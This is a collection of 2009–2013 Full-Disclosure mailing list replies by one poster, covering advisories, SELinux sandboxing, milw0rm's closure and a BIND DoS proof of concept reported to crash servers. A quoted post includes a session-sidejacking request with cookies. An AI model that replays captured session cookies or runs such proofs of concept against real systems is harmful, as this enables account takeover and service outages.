Re: [Full-disclosure] OpenSSH Security Advisory: gcmrekey.adv

[yersinia]

On Fri, Nov 8, 2013 at 7:47 PM, coderman  wrote:
> surprised not a peep about this one here yet,... hmmm
>   a fun one ;)
>
> we are accustomed to old software adding risk;
>  new (secondary effects of combined AUTH+ENC modes)
>also carries risk!

Well know possibility, yes. In any case the problem is well know
everywhere already

https://security-tracker.debian.org/tracker/CVE-2013-4548
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4548

Best

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Linux Kernel Patches For Linux Kernel Security

[yersinia]

On Sat, Sep 28, 2013 at 9:53 PM, x90c  wrote:

> Hi forks!
>
>
> I release an article for linux kernel security.
> - http://www.x90c.org/articles/linux_kernel_patches.txt
>
>
> thks, but the "article" is very short, isn't ? it look like an annotated
 index.

> x90c
>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [ MDVSA-2013:144 ] phpmyadmin

[yersinia]

Please stop sending to fd.

Already everyone here could tell the same no other linux distro is
using fd for this, iirc.

Best


2013/4/16, secur...@mandriva.com :
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
>  ___
>
>  Mandriva Linux Security Advisory MDVSA-2013:144
>  http://www.mandriva.com/en/support/security/
>  ___
>
>  Package : phpmyadmin
>  Date: April 16, 2013
>  Affected: Business Server 1.0
>  ___
>
>  Problem Description:
>
>  Multiple cross-site scripting (XSS) vulnerabilities in
>  tbl_gis_visualization.php in phpMyAdmin 3.5.x before 3.5.8 might allow
>  remote attackers to inject arbitrary web script or HTML via the (1)
>  visualizationSettings[width] or (2) visualizationSettings[height]
>  parameter (CVE-2013-1937).
>
>  This upgrade provides the latest phpmyadmin version (3.5.8) to address
>  this vulnerability.
>  ___
>
>  References:
>
>  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1937
>  ___
>
>  Updated Packages:
>
>  Mandriva Business Server 1/X86_64:
>  929b248f9b33fbf73022a491e48b88f4
> mbs1/x86_64/phpmyadmin-3.5.8-0.1.mbs1.noarch.rpm
>  9cc9136cc4280dd3d3904708be166076
> mbs1/SRPMS/phpmyadmin-3.5.8-0.1.mbs1.src.rpm
>  ___
>
>  To upgrade automatically use MandrivaUpdate or urpmi.  The verification
>  of md5 checksums and GPG signatures is performed automatically for you.
>
>  All packages are signed by Mandriva for security.  You can obtain the
>  GPG public key of the Mandriva Security Team by executing:
>
>   gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
>
>  You can view other update advisories for Mandriva Linux at:
>
>   http://www.mandriva.com/en/support/security/advisories/
>
>  If you want to report vulnerabilities, please contact
>
>   security_(at)_mandriva.com
>  ___
>
>  Type Bits/KeyID Date   User ID
>  pub  1024D/22458A98 2000-07-10 Mandriva Security Team
>   
> -BEGIN PGP SIGNATURE-
> Version: GnuPG v1.4.12 (GNU/Linux)
>
> iD8DBQFRbValmqjQ0CJFipgRAgRgAJ94hPso/CAax5T5r1qt6jZsbhsDUACg58On
> nyHMhbLL0/Ai6NaXBkFQvyw=
> =6tQS
> -END PGP SIGNATURE-
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

-- 
Inviato dal mio dispositivo mobile

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] sandboxed browsing

[yersinia]

On Wed, Aug 1, 2012 at 1:38 AM, Kyle Creyts  wrote:

> Who uses something other than a browser in a virtual machine to follow
> suspicious/possibly malicious links?
>
> If you do, what do you use, and how did you choose it?
>

On fedora/RHEL with selinux enabled you can use the xguest account for this
http://docs.fedoraproject.org/en-US/Fedora/13/html/Security-Enhanced_Linux/sect-Security-Enhanced_Linux-Confining_Users-xguest_Kiosk_Mode.htmlor
running firefox under sanbox
http://people.fedoraproject.org/~dwalsh/SELinux/Presentations/sandbox.pdf(always
selinux related)



Best regards






>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Some stats about broken Linkedin passwds

[yersinia]

On Sun, Jun 10, 2012 at 4:55 PM, Georgi Guninski wrote:

> Stumbled upon this:
> http://pastebin.com/5pjjgbMt
> ===
> LinkedIn Leaked hashes password statistics (@StefanVenken)
>
> Based on the leaked 6.5 Million hashes,
> 1.354.946 were recovered within a few hours time with HashCat / Jtr and
> publicly found wordlists on a customer grade laptop.
>
> This report was created with pipal from @Digininja
> 
>
> Ironically they broke some 40 chars pwd.
>
> Another list that contains seemingly non-dictionary pwds is at:
>
> http://pastebin.com/JmtNxcnB
>
> And here an interesting analysis
http://erratasec.blogspot.it/2012/06/linkedin-vs-password-cracking.html
Best Regards

>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Flame= cyberwar

[yersinia]

On Mon, May 28, 2012 at 5:34 PM, Peter Dawson  wrote:

> is FLAME is actually a cyberweapon ?
>
> Apparently YES

http://securityaffairs.co/wordpress/5858/malware/call-it-flame-flamer-or-skywiper-its-a-new-cyber-weapon.html?goback=.gmp_60173.gde_60173_member_119190526.gde_60173_member_119178241

http://www.jpost.com/MiddleEast/Article.aspx?ID=271709&R=R1

 regards

> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Microsoft Outlook Web Access Session sidejacking/Session Replay Vulnerability

[yersinia]

On Tue, Oct 25, 2011 at 8:26 PM, information security <
informationhacke...@gmail.com> wrote:

>
> ==
>
>   Microsoft Outlook Web Access Session
> sidejacking/Session Replay Vulnerability
>
> ===
>
>  by
>
> Asheesh Kumar Mani Tripathi
>
>
> # code by Asheesh kumar Mani Tripathi
>
> # email informationhacke...@gmail.com
>
>
> # Credit by Asheesh Anaconda
>
> #Date 25th Oct 2011
>
>
> #Product  Outlook Web Access 8.2.254.0
>
>
>
> #Vulnerability
> SideJacking is the process of sniffing web cookies, then replaying them to
> clone another user's web session. Using a cloned web session, the jacker can
> exploit the victim's previously-established site access
>
> #Impact
> This allows attackers that can read the network traffic to intercept all
> the data that is submitted to the server or web pages viewed by the client.
> Since this data includes the session cookie, it allows him to impersonate
> the victim, even if the password itself is not compromised.
>
>
>
> #Proof of concept
>
>
>
> 
>
>   Request
>
> 
> GET /owa/?ae=Folder&t=IPF.Note&a= HTTP/1.1
> Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application,
> application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap,
> application/x-shockwave-flash, application/vnd.ms-excel,
> application/vnd.ms-powerpoint, application/msword, application/x-mfe-ipt,
> */*
> Referer: https://xxxwebmail.xxx.xxx/owa/
> Accept-Language: en-in
> User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0;
> SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR
> 3.5.30729; FDM; .NET CLR 3.0.30729; .NET4.0C)
> Accept-Encoding: gzip, deflate
> Host: xxxwebmail.xxx.xxx
> Connection: Keep-Alive
> Cookie: sessionid=49307edc-0f26-4dae-95f8-02d3dc6ad8a3:000;
> cadata="25HxHgvnciGT/BOV1+yiA+HThFiE6kBtFXSjqAF0B5vvPAIKu7PA8tzKUCnW9N4Ao9E1WSzUeA27dLBgx";
> UserContext=e8997d6036554ada88a62dc9f2cf65d3
>
>
>
> 
>
>   Response
>
> 
>
> HTTP/1.1 200 OK
> Cache-Control: no-cache
> Pragma: no-cache
> Content-Length: 58676
> Content-Type: text/html; charset=utf-8
> Expires: -1
> Server: Microsoft-IIS/7.0
> X-AspNet-Version: 2.0.50727
> X-OWA-Version: 8.2.254.0
> X-UA-Compatible: IE=EmulateIE7
> X-Powered-By: ASP.NET
> Date: Tue, 25 Oct 2011 15:00:01 GMT
>
> #If you have any questions, comments, or concerns, feel free to contact me.
>
>
>
> Probably i can't understeand. Is there truly someone so crazy to don't use
ssl for the owa access ? SSL stop sidejacking, and tool - nice FWIW - as
hamster and ferret just for example.

Best Regards

> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [Dailydave] [TOOL RELEASE] T50 Sukhoi PAK FA Mixed Packet Injector v2.45r-H2HC

[yersinia]

On Tue, Jan 11, 2011 at 8:43 PM, Nelson Brito  wrote:

> T50 Sukhoi PAK FA Mixed Packet Injector (f.k.a. F22 Raptor) is a tool
> designed to perform "Stress Testing".
>

Nice tool.


If you think  useful I have added a build system
for this utility (with GNU autotools) and a toy man page.

If you're interested i have put all on github
even with the auto-generated tarball make distcheck. Perhaps some small
detail still needs to be fixed. Free of contact me if you're interested in
this.

https://github.com/yersinia/junkcode/tree/master/tool/t50/t50-2.45r-H2HC


Greetings

>
> Nelson Brito
> Security Researcher
> http://fnstenv.blogspot.com/
>
>
> ___
> Dailydave mailing list
> dailyd...@lists.immunityinc.com
> https://lists.immunityinc.com/mailman/listinfo/dailydave
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] targetted SSH bruteforce attacks

[yersinia]

On Thu, Jun 17, 2010 at 4:21 PM, Samuel Martín Moro wrote:

>
> I also don't want to change my ssh port, nor restrict incoming IPs, ... and
> I use keys only to log in without entering password.
> So you're not alone.
> I had my IP changed several times, my servers are only hosting personal
> data.
> But I'm still seeing bruteforce attemps in my logs.
>
> Here's something I use on my servers.
> In cron, every 5-10 minutes, that should do it.
> Of course, if you're running *BSD, pf is way more interesting to do that.
>
> Perhaps could be better to use something standard as fail2ban

http://www.ducea.com/2006/07/03/using-fail2ban-to-block-brute-force-attacks/?
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] United States Department of Defense Embraces Hacker Certification to Protect US Interests

[yersinia]

Perhaps this news could be of interest to someone on this lists.

http://www.free-press-release.com/news-united-states-department-of-defense-embraces-hacker-certification-to-protect-us-interests-1267435223.html

Regards
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] milw0rm

[yersinia]

On Mon, Oct 19, 2009 at 3:15 PM, yersinia  wrote:
> On Mon, Oct 19, 2009 at 2:22 PM, Alexandru Balan  wrote:
>> On Mon, Oct 19, 2009 at 2:48 PM, yersinia  wrote:
>>> On Mon, Oct 19, 2009 at 12:15 PM, Loup Samuel  wrote:
>>>> Milw0rm is Closed 0_o
>>>> "/str0ke have no more time for this job."
>>>>
>>>> See this indafrench'kiss'lang blog :
>>>> http://www.cnis-mag.com/milw0rm-ferme-ses-portes.html
>>> the question is: there is necessity of these kind of free information
>>> sites the field of computer security?
>>
>> Security companies use sites such as milw0rm  to update their software
>> and get their customers protected from those types of attacks. So yes.
> Oh, many interesting. BTW, it is something very know and i personally
> believe in this. But some of these companies invest in these sites?
> For example they contribute to the costs?
> For sites that pubblish security vulnerability as milworm, not
> security research, and controlled, like SecurityFocus - not sharp
> criticism just an opinion? I think not, sure i can be wrong. BTW, If
> not, there are not so few in 2009.
Sorry for the repost, if any.
>>
>>  especially in these days where a
>>> lot of these information is only sold and closed. If there are people
>>> who have the ambition, and the knowledge, to continue, well i am sure
>>> they will continue,knowing that there is a vast audience of peple that
>>> like to follows them, in the spirit of free knowledge. And, remember,
>>> not so much knowledge it is so free.
>>>>
>>>> -Message d'origine-
>>>> De : full-disclosure-boun...@lists.grok.org.uk 
>>>> [mailto:full-disclosure-boun...@lists.grok.org.uk] De la part de Michal
>>>> Envoyé : vendredi, 16. octobre 2009 17:49
>>>> Cc : full-disclosure@lists.grok.org.uk
>>>> Objet : Re: [Full-disclosure] milw0rm
>>>>
>>>> Anders Klixbull wrote:
>>>>> I heard he ch0ked on a lemon
>>>>>
>>>> at a lemonparty
>>>>> -Original Message-
>>>>> From: full-disclosure-boun...@lists.grok.org.uk
>>>>> [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of
>>>>> McGhee, Eddie
>>>>> Sent: 16. oktober 2009 12:45
>>>>> To: Armando Oliveira; Killian Faughnan
>>>>> Cc: full-disclosure@lists.grok.org.uk
>>>>> Subject: Re: [Full-disclosure] milw0rm
>>>>>
>>>>> Str0ke had a str0ke I heard.
>>>>>
>>>>> -Original Message-
>>>>> From: full-disclosure-boun...@lists.grok.org.uk
>>>>> [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of
>>>>> Armando Oliveira
>>>>> Sent: 16 October 2009 11:37
>>>>> To: Killian Faughnan
>>>>> Cc: full-disclosure@lists.grok.org.uk
>>>>> Subject: Re: [Full-disclosure] milw0rm
>>>>>
>>>>> up, but last update was on  21-9-2009
>>>>> does anyone know why ?
>>>>>
>>>>> On Fri, Oct 16, 2009 at 11:27 AM, Killian Faughnan
>>>>>  wrote:
>>>>>
>>>>>>> is milw0rm dead again ?
>>>>>>>
>>>>>> Seems to be up for me.
>>>>>>
>>>>>>
>>>>>>
>>>>>> ___
>>>>>> Full-Disclosure - We believe in it.
>>>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>>>>
>>>>>>
>>>>>
>>>>> ___
>>>>> Full-Disclosure - We believe in it.
>>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>>>
>>>>> ___
>>>>> Full-Disclosure - We believe in it.
>>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>>>
>>>>> ___
>>>>> Full-Disclosure - We believe in it.
>>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>>>
>>>>
>>>> ___
>>>> Full-Disclosure - We believe in it.
>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>>
>>>> ___
>>>> Full-Disclosure - We believe in it.
>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>>
>>>
>>> ___
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] milw0rm

[yersinia]

On Mon, Oct 19, 2009 at 12:15 PM, Loup Samuel  wrote:
> Milw0rm is Closed 0_o
> "/str0ke have no more time for this job."
>
> See this indafrench'kiss'lang blog :
> http://www.cnis-mag.com/milw0rm-ferme-ses-portes.html
the question is: there is necessity of these kind of free information
sites the field of computer security? especially in these days where a
lot of these information is only sold and closed. If there are people
who have the ambition, and the knowledge, to continue, well i am sure
they will continue,knowing that there is a vast audience of peple that
like to follows them, in the spirit of free knowledge. And, remember,
not so much knowledge it is so free.
>
> -Message d'origine-
> De : full-disclosure-boun...@lists.grok.org.uk 
> [mailto:full-disclosure-boun...@lists.grok.org.uk] De la part de Michal
> Envoyé : vendredi, 16. octobre 2009 17:49
> Cc : full-disclosure@lists.grok.org.uk
> Objet : Re: [Full-disclosure] milw0rm
>
> Anders Klixbull wrote:
>> I heard he ch0ked on a lemon
>>
> at a lemonparty
>> -Original Message-
>> From: full-disclosure-boun...@lists.grok.org.uk
>> [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of
>> McGhee, Eddie
>> Sent: 16. oktober 2009 12:45
>> To: Armando Oliveira; Killian Faughnan
>> Cc: full-disclosure@lists.grok.org.uk
>> Subject: Re: [Full-disclosure] milw0rm
>>
>> Str0ke had a str0ke I heard.
>>
>> -Original Message-
>> From: full-disclosure-boun...@lists.grok.org.uk
>> [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of
>> Armando Oliveira
>> Sent: 16 October 2009 11:37
>> To: Killian Faughnan
>> Cc: full-disclosure@lists.grok.org.uk
>> Subject: Re: [Full-disclosure] milw0rm
>>
>> up, but last update was on  21-9-2009
>> does anyone know why ?
>>
>> On Fri, Oct 16, 2009 at 11:27 AM, Killian Faughnan
>>  wrote:
>>
 is milw0rm dead again ?

>>> Seems to be up for me.
>>>
>>>
>>>
>>> ___
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>>
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Exploiting memory corruption vulnerabilities on Internet Explorer 8

[yersinia]

On Thu, Oct 1, 2009 at 6:44 PM, Freddie Vicious wrote:

> Yes, I am aware of the JVM and the Flash AVM heap spray techniques, no
> DEP/ASLR there... But as you said, so far there's no known "catch-all"
> technique against IE8.
> Along with other security features (
> http://blogs.msdn.com/architecture/archive/2009/08/13/internet-explorer-8-rated-tops-against-malware-and-phishing-attacks.aspx)
> this basicly means that IE8 is the most secure web browser nowadays?
>
> Depends. IMHO Non exists the more secure browser, anyway (not exists the
more secure software, never ) . But exists the more secure  env on which the
browser run. There are some difference if i run firefox in windows xp and if
i run run firefox within a selinux guest account under Fedora.

> On Thu, Oct 1, 2009 at 8:27 AM, Jared DeMott wrote:
>
>> I'm not aware of any catch-all technique just for IE8, though there are
>> a few common ones like return oriented programming.  Application
>> specific techniques are also common when third party extensions are
>> involved.
>>
>> --
>> __
>> Jared D. DeMott
>> Principal Security Researcher
>>
>>
>
>
> --
> Best wishes,
> Freddie Vicious
> http://twitter.com/viciousf
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Dumb question: Is Windows box behind a router safe ?

[yersinia]

On Tue, Sep 22, 2009 at 9:11 PM, Abhijeet Jain
wrote:

> Myth No. 2- Using Firefox does not make you safe! In fact, IE 7/8 is the
> safest browser when used with Windows Vista because it runs on lower
> privileges.
>
> Not on Linux(Fedora) with Selinux Enabled, better if you run with the
guest_u selinux usr.

>
> On Tue, Sep 22, 2009 at 1:57 PM, Kos  wrote:
>
>> Ancompuger behind a router/firewall does not make it safe.
>> Vulnerabilities and exploits are not limited to a network level, which
>> is generally what a firewall is used for. Vulnerabilities sent via any
>> protocol used (http, imap, pop, other protocols that may be in use)
>> are not suddenly secure.
>>
>> An example, there are PDFs that will trigger adobe to run, whcih can
>> be exploited easily.
>> Someone can send your father an email with a malicious attatchment,
>> and a firewall isn't going to preven him from clicking and running it.
>> Anti-virus is a good start, but will only go so far.
>> There are phishing sites too.
>> The ways to get owned are countless, regardless of a firewall or not.
>>
>> You should keep the system maintained and up to date (run system
>> updates and applications undated regularly).
>>
>> So no, a firewall will not prevent a computer from being compromised.
>>
>> Other opinions?
>>
>> Kos
>>
>> On Sep 22, 2009, at 11:29 AM, Steven Anders  wrote:
>>
>> > I received great responses and am very grateful to the help from
>> > community of this list. Thank you.
>> >
>> >
>> > I have a dumb question: Is a Windows box behind a router safe ?
>> >
>> > It is my father's PC and the Windows OS was not updated regularly.
>> > The Windows box was connected through wire (RJ45) to the router. The
>> > router is then connected to the DSL modem.
>> > The Windows Box has SP2 installed and the default Windows firewall
>> > enabled - and I think was last updated from Windows Update on in
>> > 2008. It has AVG anti virus.
>> > The PC was never moved anywhere and is always behind the router. The
>> > router has default settings, which I believe has no ports open.
>> >
>> > He never installed any applications or downloads anything off the
>> > net - mainly it is used for emails and general web browsing (using
>> > Firefox, not IE). I informed him to use Firefox, since IE has so
>> > many security issues.
>> >
>> >
>> > My questions are:
>> >
>> > 1.  There are many exploits and vulnerabilities of Windows, but I
>> > was wondering if outdated Windows box behind router generally
>> > safe ?  Since, the Windows box was not updated with the latest
>> > updates.
>> >
>> > I have always thought that having a computer behind the router
>> > (since router has firewall) is generally safe, but I would love to
>> > hear insights or thoughts.
>> >
>> >
>> > 2. If a Windows box is behind a router, could a botnet be installed
>> > to it ? Assuming, the end user does not install/download any
>> > applications from the Internet and always use Firefox.
>> >
>> >
>> > Thank you all in advance.
>> > steve
>> >
>> > ___
>> > Full-Disclosure - We believe in it.
>> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> > Hosted and sponsored by Secunia - http://secunia.com/
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
>
> --
> 1q4!7EEf71!u
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] R. RHEL, RHCS, and Selinux : hype, reality or dream?

[yersinia]

So it seems that it is not necessary to be a clever hacker as spender to
disable SELinux on a system
(http://grsecurity.net/~spender/exploit.txt).
Just follow the directions of the vendor. This one require to disable
selinux for the proper function of one of its HA products, after years that
the same vendor was critical with commercial product, o badly compiled open
source for SELINUX execmem o textreloc issue,  because they require the
same.

http://marc.info/?l=selinux&m=125244025732144&w=2


James Morris first answer

http://marc.info/?l=selinux&m=125245247920355&w=2


So articles like this are just marketing?


http://magazine.redhat.com/2007/05/04/whats-new-in-selinux-for-red-hat-enterprise-linux-5/

Regards
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] why not a sandbox

[yersinia]

On Sat, Sep 5, 2009 at 12:58 PM, Adrenalin  wrote:

> It seems like the plugins in Chrome are not in a sandbox
>
> "One additional, important area that is not covered by the sandbox are
> plugins like Flash. Restricting what plugins can do does not fit well with
> what users expect, which makes plugins a major vector for attack. Langley
> said that the plugin support on Linux is relatively new, but "our
> experience on Windows is that, in order for Flash to do all the things that
> various sites expect it to be able to do, the sandbox has to be so full of
> holes that it's rather useless". He is currently looking at SELinux as a
> way to potentially restrict plugins, but, for now, they are wide open. "
>
> Google's Chromium sandbox - http://lwn.net/Articles/347547/ (August 19,
> 2009)
>
> From design-documents page "It is also possible to run the plugin processes
> inside a sandbox target, using the --safe-plugins command line." hm
>
> IMHO, if you want to go in a real or almost so , sandbox you have to
execute with a MAC security policy. Something like
http://danwalsh.livejournal.com/13376.html

BTW, xguest is on Fedora 10/11.  But a virtual machine could be better.
Protected with svirt, of course. http://danwalsh.livejournal.com/30565.html


> On Sat, Sep 5, 2009 at 12:23 PM, BlackHawk  wrote:
>
>> doesn't chrome already run any single tab in a sandbox?
>>
>> http://dev.chromium.org/developers/design-documents/sandbox
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] THISISNOTMYEXPLOIT

[yersinia]

On Mon, Aug 3, 2009 at 5:49 PM, taha wrote:
>
>
> On Sat, Aug 1, 2009 at 3:25 PM, yersinia  wrote:
>>
>> On Fri, Jul 31, 2009 at 5:58 PM, Kingcope wrote:
>> > Hello people,
>> > Yes there is a warning when the PoC is compiled. But I guess that is
>> > not a big issue.
>>
>> No, problem. It is only necessary to include stdlib.h because malloc
>> is implicitily defined (gcc complaint). Anyway,  your POC work as
>> aspected. Thanks. In this days it is difficult to see a true exploit
>> in a mailing list. The fact that bug was discovered from someone else
>> is not important : you have rewritten in another language, so it is
>> only your work.
>>
>> Regards
>> > So about what PoC am I talking about?
>> > It seems that the moderator of bugtraq keeps blocking me because of
>> > fancy
>> > headlines maybe. The moderator of bugtraq blocked the actual exploit but
>> > let
>> > the following messages slip through. The PoC is on milw0rm.com and
>> > full disclosure.
>> > Thanks for clarifying the issue with the zones, I really have not a
>> > 100% understanding
>> > of the DNS protocol therefore I took a guess on my named.conf file and
>> > put the
>> > address into the PoC.
>> >
>> > Thanks for your time,
>> >
>> > Kingcope
>> >
>> >
>> > 2009/7/31 yersinia :
>> >> Repost for mailing problem.
>> >> On Fri, Jul 31, 2009 at 12:14 AM, yersinia 
>> >> wrote:
>> >>>
>> >>> On Thu, Jul 30, 2009 at 1:24 PM, Kingcope 
>> >>> wrote:
>> >>>>
>> >>>> Hello again,
>> >>>> the default setting of 127.in-addr.arpa is a bit weird
>> >>>>
>> >>>> try
>> >>>> ./bind  localhost
>> >>>
>> >>> Never mind. I have only a warning from gcc because it was necessary to
>> >>> include stdlib.h for malloc.
>> >>>
>> >>> But, the important thing is that it works as aspected.
>> >>>
>> >>> Regards
>> >>>>
>> >>>> lewls
>> >>>>
>> >>>> XD
>> >>>>
>> >>>> kcope
>> >>>>
>
> Hello all,
> By reading the US-CERT vulnerability issue (CVE-2009-0696) I found this :
> "The vulnerability affects all servers that are masters for one or more
> zones and is not limited to those that are configured to allow dynamic
> updates ". I have some Infoblox master DNS servers with not-allowed dynamic
> updates, so I'm wondering if they are vulnerable to this attack and if
> somebody test this PoC on a DNS server which not allow dynamic updates? What
> is the comportement in this case?

Crash.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] THISISNOTMYEXPLOIT

[yersinia]

On Fri, Jul 31, 2009 at 5:58 PM, Kingcope wrote:
> Hello people,
> Yes there is a warning when the PoC is compiled. But I guess that is
> not a big issue.

No, problem. It is only necessary to include stdlib.h because malloc
is implicitily defined (gcc complaint). Anyway,  your POC work as
aspected. Thanks. In this days it is difficult to see a true exploit
in a mailing list. The fact that bug was discovered from someone else
is not important : you have rewritten in another language, so it is
only your work.

Regards
> So about what PoC am I talking about?
> It seems that the moderator of bugtraq keeps blocking me because of fancy
> headlines maybe. The moderator of bugtraq blocked the actual exploit but let
> the following messages slip through. The PoC is on milw0rm.com and
> full disclosure.
> Thanks for clarifying the issue with the zones, I really have not a
> 100% understanding
> of the DNS protocol therefore I took a guess on my named.conf file and put the
> address into the PoC.
>
> Thanks for your time,
>
> Kingcope
>
>
> 2009/7/31 yersinia :
>> Repost for mailing problem.
>> On Fri, Jul 31, 2009 at 12:14 AM, yersinia  wrote:
>>>
>>> On Thu, Jul 30, 2009 at 1:24 PM, Kingcope  wrote:
>>>>
>>>> Hello again,
>>>> the default setting of 127.in-addr.arpa is a bit weird
>>>>
>>>> try
>>>> ./bind  localhost
>>>
>>> Never mind. I have only a warning from gcc because it was necessary to 
>>> include stdlib.h for malloc.
>>>
>>> But, the important thing is that it works as aspected.
>>>
>>> Regards
>>>>
>>>> lewls
>>>>
>>>> XD
>>>>
>>>> kcope
>>>>
>>>> 2009/7/30 Kingcope :
>>>> > I own nothing.
>>>> >
>>>> > Cheers,
